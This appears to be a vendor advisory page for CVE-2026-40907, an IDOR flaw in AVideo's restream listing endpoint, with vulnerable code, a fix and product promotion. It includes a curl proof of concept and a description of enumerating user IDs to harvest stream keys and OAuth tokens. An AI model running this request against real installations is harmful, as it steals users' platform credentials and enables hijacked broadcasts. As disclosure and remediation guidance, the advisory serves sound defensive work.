CVE-2026-40907

CVE-2026-40907 is a medium-severity security vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.

Summary

The endpoint plugin/Live/view/Live_restreams/list.json.php contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated user with streaming permission to retrieve other users' live restream configurations, including third-party platform stream keys and OAuth tokens (access_token, refresh_token) for services like YouTube Live, Facebook Live, and Twitch.

Details

The authorization logic in list.json.php is intended to restrict non-admin users to viewing only their own restream records. However, the implementation at lines 10-14 only enforces this when the users_id GET parameter is absent:

// plugin/Live/view/Live_restreams/list.json.php:6-19
if (!User::canStream()) {
    die('{"data": []}');
}

if (empty($_GET['users_id'])) {       // Line 10: only triggers when param is MISSING
    if (!User::isAdmin()) {
        $_GET['users_id'] = User::getId();  // Line 12: force to own ID
    }
}

if (empty($_GET['users_id'])) {
    $rows = Live_restreams::getAll();
} else {
    $rows = Live_restreams::getAllFromUser($_GET['users_id'], "");  // Line 19: attacker-controlled ID
}

When a non-admin user explicitly supplies ?users_id=<victim_id>, the value is non-empty, so the override at line 12 is never reached. The attacker-controlled ID passes directly to getAllFromUser(), which executes:

// plugin/Live/Objects/Live_restreams.php:90
$sql = "SELECT * FROM live_restreams WHERE users_id = $users_id";

This returns all columns from the live_restreams table, including:

  • stream_key (VARCHAR 500), the victim's RTMP stream key for third-party platforms
  • stream_url (VARCHAR 500), the RTMP ingest endpoint
  • parameters (TEXT), JSON blob containing OAuth credentials (access_token, refresh_token, expires_at) obtained via the restream.ypt.me OAuth flow

Other endpoints in the same directory correctly validate ownership. For example, delete.json.php:19:

if (!User::isAdmin() && $row->getUsers_id() != User::getId()) {
    $obj->msg = "You are not admin";
    die(json_encode($obj));
}

This ownership check is missing from list.json.php.

PoC

Prerequisites: Two user accounts, attacker (user ID 2, streaming permission) and victim (user ID 1, has configured restreams with third-party platform keys).

Step 1: Attacker authenticates and retrieves their session cookie.

Step 2: Attacker requests victim's restream list:

curl -s -b 'PHPSESSID=<attacker_session>' \
  'https://target.com/plugin/Live/view/Live_restreams/list.json.php?users_id=1'

Expected response (normal behavior): Empty data or error.

Actual response: Full restream records for user ID 1:

{
  "data": [
    {
      "id": 1,
      "name": "YouTube Live",
      "stream_url": "rtmp://a.rtmp.youtube.com/live2",
      "stream_key": "xxxx-xxxx-xxxx-xxxx-xxxx",
      "parameters": "{\"access_token\":\"ya29.a0A...\",\"refresh_token\":\"1//0e...\",\"expires_at\":1712600000}",
      "users_id": 1,
      "status": "a"
    }
  ]
}

Step 3: Attacker can enumerate all user IDs (1, 2, 3, ...) to harvest all configured restream credentials across the platform.

Impact

  • Credential theft: Attacker obtains third-party platform stream keys and OAuth tokens (access_token, refresh_token) for all users who have configured live restreaming.
  • Unauthorized broadcasting: Stolen RTMP stream keys allow the attacker to broadcast arbitrary content to the victim's YouTube, Facebook, or Twitch channels.
  • OAuth token abuse: Stolen refresh tokens can be used to obtain new access tokens, providing persistent access to the victim's third-party accounts within the scope of the original OAuth grant.
  • Full enumeration: User IDs are sequential integers, enabling trivial enumeration of all platform users' restream credentials.

CVE-2026-40907 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 29.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add an ownership check in list.json.php consistent with the pattern used in delete.json.php and add.json.php:

// plugin/Live/view/Live_restreams/list.json.php, replace lines 10-14
if (!User::isAdmin()) {
    $_GET['users_id'] = User::getId();
}

This unconditionally forces non-admin users to their own user ID, regardless of whether the users_id parameter was supplied. The empty() check should be removed so that the parameter cannot be used to bypass the restriction.

Frequently Asked Questions

  1. What is CVE-2026-40907? CVE-2026-40907 is a medium-severity security vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.
  2. How severe is CVE-2026-40907? CVE-2026-40907 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-40907? wwbn/avideo (composer) versions <= 29.0 is affected.
  4. Is there a fix for CVE-2026-40907? No fixed version is listed for CVE-2026-40907 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-40907 exploitable, and should I be worried? Whether CVE-2026-40907 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-40907 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.